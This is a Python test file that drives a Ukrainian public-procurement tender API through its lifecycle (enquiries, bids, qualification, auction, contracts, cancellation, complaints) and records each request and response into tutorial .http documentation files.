    "data": {
        "tenderers": [
            {
                "address": {
                    "countryName": "Україна",
                    "locality": "м. Львів",
                    "postalCode": "79013",
                    "region": "м. Львів",
                    "streetAddress": "вул. Островського, 35"
                },
                "contactPoint": {
                    "email": "fake@mail.com",
                    "name": "Іван Іваненко",
                    "telephone": "+380 (322) 12-34-56"
                },
                "identifier": {
                    "scheme": u"UA-EDR",
                    "id": u"00137226",
                    "uri": u"http://www.sc.gov.ua/"
                },
                "name": "«Снігур»"
            }
        ],
        "value": {
            "amount": 5
        },
    }
}
# Enquiry-stage question payload posted against the tender.
question = {
    "data": {
        "author": {
            "address": {
                "countryName": "Україна",
                "locality": "м. Вінниця",
                "postalCode": "21100",
                "region": "м. Вінниця",
                "streetAddress": "вул. Островського, 33"
            },
            "contactPoint": {
                "email": "soleksuk@gmail.com",
                "name": "Сергій Олексюк",
                "telephone": "+380 (432) 21-69-30"
            },
            "identifier": {
                "id": "00137226",
                "legalName": "Державне комунальне підприємство громадського харчування «Школяр»",
                "scheme": "UA-EDR",
                "uri": "http://sch10.edu.vn.ua/"
            },
            "name": "ДКП «Школяр»"
        },
        "description": "Просимо додати таблицю потрібної калорійності харчування",
        "title": "Калорійність"
    }
}
# Procuring entity's answer to the question above.
answer = {
    "data": {
        "answer": "Таблицю додано в файлі \"Kalorijnist.xslx\""
    }
}
# Minimal cancellation request body.
cancellation = {
    'data': {
        'reason': 'cancellation reason'
    }
}
# Complaint payload (same author organization as the question fixture).
complaint = {
    "data": {
        "author": {
            "address": {
                "countryName": "Україна",
                "locality": "м. Вінниця",
                "postalCode": "21100",
                "region": "м. Вінниця",
                "streetAddress": "вул. Островського, 33"
            },
            "contactPoint": {
                "email": "soleksuk@gmail.com",
                "name": "Сергій Олексюк",
                "telephone": "+380 (432) 21-69-30"
            },
            "identifier": {
                "id": "13313462",
                "legalName": "Державне комунальне підприємство громадського харчування «Школяр»",
                "scheme": "UA-EDR",
                "uri": "http://sch10.edu.vn.ua/"
            },
            "name": "ДКП «Школяр»"
        },
        "description": "Умови виставлені замовником не містять достатньо інформації, щоб заявка мала сенс.",
        "title": "Недостатньо інформації"
    }
}
# Two lots reusing the tender fixture's value/minimalStep by reference.
test_lots = [
    {
        'title': 'Лот №1',
        'description': 'Опис Лот №1',
        'value': test_tender_data['value'],
        'minimalStep': test_tender_data['minimalStep'],
    },
    {
        'title': 'Лот №2',
        'description': 'Опис Лот №2',
        'value': test_tender_data['value'],
        'minimalStep': test_tender_data['minimalStep'],
    }
]
class DumpsTestAppwebtest(TestApp):
    """TestApp that dumps every request/response pair to ``self.file_obj``.

    When ``self.file_obj`` is set and open, each HTTP exchange is written out
    (with JSON bodies pretty-printed) so the docs tutorial .http files can be
    generated from real API traffic. Otherwise behaves like a plain TestApp.
    """

    def do_request(self, req, status=None, expect_errors=None):
        req.headers.environ["HTTP_HOST"] = "api-sandbox.openprocurement.org"
        if hasattr(self, 'file_obj') and not self.file_obj.closed:
            self.file_obj.write(req.as_bytes(True))
            self.file_obj.write("\n")
            if req.body:
                # Best-effort pretty print; non-JSON bodies (e.g. multipart
                # uploads) are skipped. Was a bare `except:` which also
                # swallowed KeyboardInterrupt/SystemExit.
                try:
                    self.file_obj.write(
                        'DATA:\n' + json.dumps(json.loads(req.body), indent=2, ensure_ascii=False).encode('utf8'))
                    self.file_obj.write("\n")
                except Exception:
                    pass
            self.file_obj.write("\n")
        resp = super(DumpsTestAppwebtest, self).do_request(req, status=status, expect_errors=expect_errors)
        if hasattr(self, 'file_obj') and not self.file_obj.closed:
            # Drop Content-Length so regenerated docs stay stable across runs.
            headers = [(n.title(), v)
                       for n, v in resp.headerlist
                       if n.lower() != 'content-length']
            headers.sort()
            self.file_obj.write(str('Response: %s\n%s\n') % (
                resp.status,
                str('\n').join([str('%s: %s') % (n, v) for n, v in headers]),
            ))
            if resp.testbody:
                # Best-effort pretty print of the JSON response body.
                try:
                    self.file_obj.write(json.dumps(json.loads(resp.testbody), indent=2, ensure_ascii=False).encode('utf8'))
                except Exception:
                    pass
            self.file_obj.write("\n\n")
        return resp
class TenderResourceTest(BaseTenderWebTest):
initial_data = test_tender_data
    def setUp(self):
        # Use the dumping TestApp so every request/response made by this test
        # is captured into the tutorial .http files.
        self.app = DumpsTestAppwebtest(
            "config:tests.ini", relative_to=os.path.dirname(base_test.__file__))
        self.app.RequestClass = PrefixedRequestClass
        # Default authorization: broker user with an empty password.
        self.app.authorization = ('Basic', ('broker', ''))
        # Keep handles to the backing CouchDB server/database for cleanup.
        self.couchdb_server = self.app.app.registry.couchdb_server
        self.db = self.app.app.registry.db
def test_docs(self):
request_path = '/tenders?opt_pretty=1'
#### Exploring basic rules
#
with open('docs/source/tutorial/tender-listing.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.file_obj.write("\n")
with open('docs/source/tutorial/tender-post-attempt.http', 'w') as self.app.file_obj:
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/tender-post-attempt-json.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
#### Creating tender
#
with open('docs/source/tutorial/tender-post-attempt-json-data.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
with open('docs/source/tutorial/blank-tender-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-listing-no-auth.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
#### Modifying tender
#
tenderPeriod_endDate = get_now() + timedelta(days=30, seconds=10)
with open('docs/source/tutorial/patch-items-value-periods.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
with open('docs/source/tutorial/tender-listing-after-patch.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
self.tender_id = tender['id']
# Setting Bid guarantee
#
with open('docs/source/tutorial/set-bid-guarantee.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, owner_token), {"data": {"guarantee": {"amount": 8, "currency": "USD"}}})
self.assertEqual(response.status, '200 OK')
self.assertIn('guarantee', response.json['data'])
#### Uploading documentation
#
with open('docs/source/tutorial/upload-tender-notice.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token), upload_files=[('file', u'Notice.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
doc_id = response.json["data"]["id"]
with open('docs/source/tutorial/tender-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents/{}?acc_token={}'.format(
self.tender_id, doc_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/upload-award-criteria.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token), upload_files=[('file', u'AwardCriteria.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
doc_id = response.json["data"]["id"]
with open('docs/source/tutorial/tender-documents-2.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/update-award-criteria.http', 'w') as self.app.file_obj:
response = self.app.put('/tenders/{}/documents/{}?acc_token={}'.format(
self.tender_id, doc_id, owner_token), upload_files=[('file', 'AwardCriteria-2.pdf', 'content2')])
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-documents-3.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents'.format(
self.tender_id))
self.assertEqual(response.status, '200 OK')
#### Enquiries
#
with open('docs/source/tutorial/ask-question.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id), question, status=201)
question_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/answer-question.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/questions/{}?acc_token={}'.format(
self.tender_id, question_id, owner_token), answer, status=200)
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/list-question.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/questions'.format(
self.tender_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/get-answer.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/questions/{}'.format(
self.tender_id, question_id))
self.assertEqual(response.status, '200 OK')
self.time_shift('enquiryPeriod_ends')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/update-tender-after-enqiery.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}?acc_token={}'.format(tender['id'], owner_token))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {"value": {'amount': 501.0}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
with open('docs/source/tutorial/ask-question-after-enquiry-period.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id), question, status=403)
self.assertEqual(response.status, '403 Forbidden')
with open('docs/source/tutorial/update-tender-after-enqiery-with-update-periods.http', 'w') as self.app.file_obj:
tenderPeriod_endDate = get_now() + timedelta(days=8)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"value": {
"amount": 501,
"currency": u"UAH"
},
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
self.assertEqual(response.status, '200 OK')
#### Registering bid
#
bids_access = {}
with open('docs/source/tutorial/register-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid)
bid1_id = response.json['data']['id']
bids_access[bid1_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/activate-bidder.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), {"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
#### Proposal Uploading
#
with open('docs/source/tutorial/upload-bid-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'Proposal.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/upload-bid-private-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'Proposal_top_secrets.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
priv_doc_id = response.json['data']['id']
# set confidentiality properties
with open('docs/source/tutorial/mark-bid-doc-private.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}/documents/{}?acc_token={}'.format(
self.tender_id, bid1_id, priv_doc_id, bids_access[bid1_id]), {'data': {
'confidentiality': 'buyerOnly',
'confidentialityRationale': 'Only our company sells badgers with pink hair.',
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/upload-bid-financial-document-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'financial_doc.pdf', '1000$')])
self.assertEqual(response.status, '201 Created')
financial_doc_id = response.json['data']['id']
response = self.app.post('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'financial_doc2.pdf', '1000$')])
self.assertEqual(response.status, '201 Created')
financial_doc_id = response.json['data']['id']
with open('docs/source/tutorial/bidder-financial-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/upload-bid-eligibility-document-proposal.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/bids/{}/eligibility_documents?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'eligibility_doc.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
# eligibility_doc_id = response.json['data']['id']
#with open('docs/source/tutorial/upload-bid-qualification-document-proposal.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/bids/{}/qualification_documents?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'qualification_document.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/bidder-view-financial-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {"value": {'amount': 501.0}}})
self.assertEqual(response.status, '200 OK')
#### Bid invalidation
#
with open('docs/source/tutorial/bidder-after-changing-tender.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
#### Bid confirmation
#
with open('docs/source/tutorial/bidder-activate-after-changing-tender.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), {'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
# with open('docs/source/tutorial/bidder-after-activate-bid-tender.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]))
# self.assertEqual(response.status, '200 OK')
# tutorial/register-2nd-bidder.http
with open('docs/source/tutorial/register-2nd-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid2)
bid2_id = response.json['data']['id']
bids_access[bid2_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/register-3rd-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid3)
bid3_id = response.json['data']['id']
bids_access[bid3_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
# Pre-qualification
self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
auth = self.app.authorization
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.app.authorization = auth
with open('docs/source/tutorial/qualifications-listing.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(
self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']['qualifications']
self.assertEqual(len(qualifications), 3)
self.assertEqual(qualifications[0]['bidID'], bid1_id)
self.assertEqual(qualifications[1]['bidID'], bid2_id)
self.assertEqual(qualifications[2]['bidID'], bid3_id)
with open('docs/source/tutorial/approve-qualification1.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[0]['id'],
owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/approve-qualification2.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[1]['id'],
owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/reject-qualification3.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[2]['id'],
owner_token), {"data": {"status": "unsuccessful"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/qualificated-bids-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids?acc_token={}'.format(
self.tender_id, owner_token))
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/rejected-bid-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid3_id, owner_token))
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
with open('docs/source/tutorial/pre-qualification-confirmation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
#### Auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
patch_data = {
'auctionUrl': u'http://auction-sandbox.openprocurement.org/tenders/{}'.format(self.tender_id),
'bids': [
{
"id": bid1_id,
"participationUrl": u'http://auction-sandbox.openprocurement.org/tenders/{}?key_for_bid={}'.format(self.tender_id, bid1_id)
},
{
"id": bid2_id,
"participationUrl": u'http://auction-sandbox.openprocurement.org/tenders/{}?key_for_bid={}'.format(self.tender_id, bid2_id)
},
{
"id": bid3_id
}
]
}
response = self.app.patch_json('/tenders/{}/auction?acc_token={}'.format(self.tender_id, owner_token),
{'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/auction-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/bidder-participation-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/bidder2-participation-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid2_id, bids_access[bid2_id]))
self.assertEqual(response.status, '200 OK')
#### Confirming qualification
#
# self.set_status('active.qualification')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
response = self.app.post_json('/tenders/{}/auction'.format(self.tender_id),
{'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
with open('docs/source/tutorial/confirm-qualification.http', 'w') as self.app.file_obj:
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
response = self.app.get('/tenders/{}/contracts?acc_token={}'.format(
self.tender_id, owner_token))
self.contract_id = response.json['data'][0]['id']
#### Set contract value
tender = self.db.get(self.tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
with open('docs/source/tutorial/tender-contract-set-contract-value.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {"data": {"contractNumber": "contract#1", "value": {"amount": 238}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['value']['amount'], 238)
#### Setting contract signature date
#
with open('docs/source/tutorial/tender-contract-sign-date.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {'data': {"dateSigned": get_now().isoformat()} })
self.assertEqual(response.status, '200 OK')
#### Setting contract period
period_dates = {"period": {"startDate": (get_now()).isoformat(), "endDate": (get_now() + timedelta(days=365)).isoformat()}}
with open('docs/source/tutorial/tender-contract-period.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {'data': {'period': period_dates["period"]}})
self.assertEqual(response.status, '200 OK')
#### Uploading contract documentation
#
with open('docs/source/tutorial/tender-contract-upload-document.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), upload_files=[('file', 'contract_first_document.doc', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/tender-contract-get-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}/documents'.format(
self.tender_id, self.contract_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-upload-second-document.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), upload_files=[('file', 'contract_second_document.doc', 'content')])
self.assertEqual(response.status, '201 Created')
self.document_id = response.json['data']['id']
with open('docs/source/tutorial/tender-contract-patch-document.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(
self.tender_id, self.contract_id, self.document_id, owner_token), {'data': {"language": 'en', 'title_en': 'Title of Document', 'description_en': 'Description of Document'}} )
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-get-documents-again.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}/documents'.format(
self.tender_id, self.contract_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-contract-get.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token))
self.assertEqual(response.status, '200 OK')
#### Preparing the cancellation request
#
with open('docs/source/tutorial/prepare-cancellation.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token), cancellation)
self.assertEqual(response.status, '201 Created')
cancellation_id = response.json['data']['id']
with open('docs/source/tutorial/update-cancellation-reasonType.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), {"data":{'reasonType': 'unsuccessful'}})
self.assertEqual(response.status, '200 OK')
#### Filling cancellation with protocol and supplementary documentation
#
with open('docs/source/tutorial/upload-cancellation-doc.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), upload_files=[('file', u'Notice.pdf', 'content')])
cancellation_doc_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/patch-cancellation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}/documents/{}?acc_token={}'.format(
self.tender_id, cancellation_id, cancellation_doc_id, owner_token), {'data': {"description": 'Changed description'}} )
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/update-cancellation-doc.http', 'w') as self.app.file_obj:
response = self.app.put('/tenders/{}/cancellations/{}/documents/{}?acc_token={}'.format(
self.tender_id, cancellation_id, cancellation_doc_id, owner_token), upload_files=[('file', 'Notice-2.pdf', 'content2')])
self.assertEqual(response.status, '200 OK')
#### Activating the request and cancelling tender
#
with open('docs/source/tutorial/active-cancellation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token), {"data":{"status":"active"}})
self.assertEqual(response.status, '200 OK')
@unittest.skip("complaints not implemented")
def test_complaints(self):
    """Generate the tutorial ``*.http`` fixtures for the tender complaint flow.

    Each ``with open(...) as self.app.file_obj`` block captures the request(s)
    made inside it into a docs fixture file.  Seven complaints are driven
    through the documented states (draft -> claim -> pending -> answered ->
    resolved / invalid / declined / stopped / cancelled), switching between
    the broker and reviewer authorizations where the API requires it.
    """
    # Create the tender all complaints will be filed against.
    response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
    self.assertEqual(response.status, '201 Created')
    tender = response.json['data']
    owner_token = response.json['access']['token']
    self.tender_id = tender['id']

    # Complaint #1: submitted as a draft, with an attachment.
    with open('docs/source/tutorial/complaint-submission.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint)
        self.assertEqual(response.status, '201 Created')
    complaint1_token = response.json['access']['token']
    complaint1_id = response.json['data']['id']
    with open('docs/source/tutorial/complaint-submission-upload.http', 'w') as self.app.file_obj:
        response = self.app.post('/tenders/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token),
                                 upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
    # Escalate the draft to a claim.
    with open('docs/source/tutorial/complaint-claim.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token), {"data": {"status": "claim"}})
        self.assertEqual(response.status, '200 OK')

    # Complaint #2: submitted directly in "claim" status.
    claim = {'data': complaint['data'].copy()}
    claim['data']['status'] = 'claim'
    with open('docs/source/tutorial/complaint-submission-claim.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), claim)
        self.assertEqual(response.status, '201 Created')
    complaint2_token = response.json['access']['token']
    complaint2_id = response.json['data']['id']

    # Complaint #3: submitted directly in "pending" status.
    complaint_data = {'data': complaint['data'].copy()}
    complaint_data['data']['status'] = 'pending'
    with open('docs/source/tutorial/complaint-submission-complaint.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
        self.assertEqual(response.status, '201 Created')
    complaint3_id = response.json['data']['id']
    complaint3_token = response.json['access']['token']

    # Complaint #4: another claim (no fixture captured for its creation).
    response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), claim)
    self.assertEqual(response.status, '201 Created')
    complaint4_id = response.json['data']['id']
    complaint4_token = response.json['access']['token']

    # Complaint #1 escalates from claim to a pending complaint.
    with open('docs/source/tutorial/complaint-complaint.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
        self.assertEqual(response.status, '200 OK')

    # Tender owner answers claim #2 as resolved...
    with open('docs/source/tutorial/complaint-answer.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, owner_token), {"data": {
            "status": "answered",
            "resolutionType": "resolved",
            "resolution": "Виправлено неконкурентні умови"
        }})
        self.assertEqual(response.status, '200 OK')
    # ...and claim #4 as invalid (no fixture captured).
    response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, owner_token), {"data": {
        "status": "answered",
        "resolutionType": "invalid",
        "resolution": "Вимога не відповідає предмету закупівлі"
    }})
    self.assertEqual(response.status, '200 OK')

    # Complainant #2 accepts the answer; the claim is resolved.
    with open('docs/source/tutorial/complaint-satisfy.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, complaint2_token), {"data": {
            "satisfied": True,
            "status": "resolved"
        }})
        self.assertEqual(response.status, '200 OK')

    # Complainant #4 rejects the answer and escalates to a pending complaint.
    with open('docs/source/tutorial/complaint-escalate.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, complaint4_token), {"data": {
            "satisfied": False,
            "status": "pending"
        }})
        self.assertEqual(response.status, '200 OK')

    # Complaints #5 and #6: two more pending complaints for the
    # stopped / stopping scenarios below.
    response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
    self.assertEqual(response.status, '201 Created')
    complaint5_id = response.json['data']['id']
    complaint5_token = response.json['access']['token']
    response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint_data)
    self.assertEqual(response.status, '201 Created')
    complaint6_id = response.json['data']['id']
    complaint6_token = response.json['access']['token']

    # The reviewer triages the pending complaints (no acc_token needed).
    self.app.authorization = ('Basic', ('reviewer', ''))
    with open('docs/source/tutorial/complaint-reject.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint4_id), {"data": {
            "status": "invalid"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/complaint-accept.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id), {"data": {
            "status": "accepted"
        }})
        self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id), {"data": {
        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id), {"data": {
